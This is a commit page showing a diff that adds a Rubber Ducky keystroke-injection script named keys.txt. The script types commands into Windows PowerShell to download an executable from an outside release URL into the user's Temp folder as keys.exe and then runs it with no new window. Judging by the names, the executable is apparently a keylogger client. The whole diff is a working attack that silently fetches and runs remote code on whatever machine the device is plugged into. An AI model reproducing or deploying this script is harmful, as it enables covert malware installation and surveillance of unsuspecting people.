✨ Adds rubber ducky script
This commit is contained in:
parent
f7ff35dcb8
commit
2abef32841
15
keys.txt
Normal file
15
keys.txt
Normal file
@ -0,0 +1,15 @@
|
||||
REM open powershell
|
||||
WIN R
|
||||
STRING powershell
|
||||
ENTER
|
||||
DELAY 1000
|
||||
|
||||
REM download client.exe file
|
||||
STRING Invoke-WebRequest https://gitea.svitan.dev/Streamer272/keys/releases/download/v1.0.0/client.exe -OutFile .\AppData\Local\Temp\keys.exe
|
||||
ENTER
|
||||
DELAY 13000
|
||||
|
||||
RUN client.exe file
|
||||
STRING Start-Process -FilePath .\AppData\Local\Temp\keys.exe -NoNewWindow
|
||||
ENTER
|
||||
DELAY 1000
|
Loading…
x
Reference in New Issue
Block a user